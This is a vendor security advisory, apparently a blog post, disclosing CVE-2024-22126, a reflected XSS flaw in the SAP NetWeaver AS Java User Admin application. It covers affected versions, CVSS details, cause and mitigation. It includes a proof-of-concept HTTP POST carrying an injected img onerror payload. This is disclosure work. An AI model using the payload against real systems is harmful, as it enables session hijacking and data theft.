Skip links
Vahagn Vardanian

Vahagn Vardanian

Co-founder and CTO of RedRays

[PoC] [Fixed] [CVE-2024-22126] Critical XSS Vulnerability Identified in SAP NetWeaver AS Java

Date of Release: February 13, 2024

Advisory ID: CVE-2024-22126

Affected Software: SAP NetWeaver Application Server for Java (AS Java) User Admin Application

Versions Affected: J2EE ENGINE APPLICATIONS 7.50, specifically:

  • SP026000005
  • SP027000003
  • SP028000003
  • SP029000000

Vulnerability Summary: A critical Cross-Site Scripting (XSS) vulnerability, CVE-2024-22126, has been discovered in the User Admin application of SAP NetWeaver AS for Java. The vulnerability arises due to insufficient validation and improper encoding of incoming URL parameters before including them in the redirect URL. This flaw can lead to a significant compromise of confidentiality, with a lesser impact on integrity and availability.

CVSS Score: 8.8 (High)

PoC:

POST /useradmin/index.jsp HTTP/1.1
Host: SAP-Server:50000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

“><img src%3dx onerror%3dalert(1)>

CVSS Vector:

  • Attack Vector (AV): Network
  • Attack Complexity (AC): Low
  • Privileges Required (PR): None
  • User Interaction (UI): Required
  • Scope (S): Changed
  • Confidentiality Impact (C): High
  • Integrity Impact (I): Low
  • Availability Impact (A): Low

Symptom: Attackers can exploit this vulnerability by crafting malicious URL parameters that are reflected back to the user’s browser, leading to XSS attacks. This could result in unauthorized access to user sessions and personal data, posing a severe security risk.

Cause: The vulnerability is introduced after applying SAP Note 3251396, which inadequately validates and encodes URL parameters for redirects, allowing for the XSS vulnerability.

Solution: Users are urged to apply the corrective measures provided in the “Validity” and “Support Packages & Patches” sections of the SAP Security Note related to CVE-2024-22126. It is also recommended to review SAP Note 1974464 for information on SCA Dependency Analysis for Java download objects to avoid system incompatibilities.

Mitigation: Until patches can be applied, it is advised to monitor and possibly restrict incoming URL parameters to the User Admin application to mitigate the risk of exploitation.

References:

  • SAP Security Note [CVE-2024-22126]
  • SAP Note 3251396
  • SAP Note 1974464

The signature of this vulnerability has been added to the RedRays Security Platform.

Explore More

RedRays AI for ABAP Code Security

Empowering Secure, Efficient, and Compliant SAP ABAP Development—in Real Time and Without Data Retention In today’s rapidly evolving business landscape, organizations increasingly

Special offer for SAP Security Udemy course!

$ 9.99

Join “SAP Security Core Concepts and Security Administration” which is part of the Blackhat course series.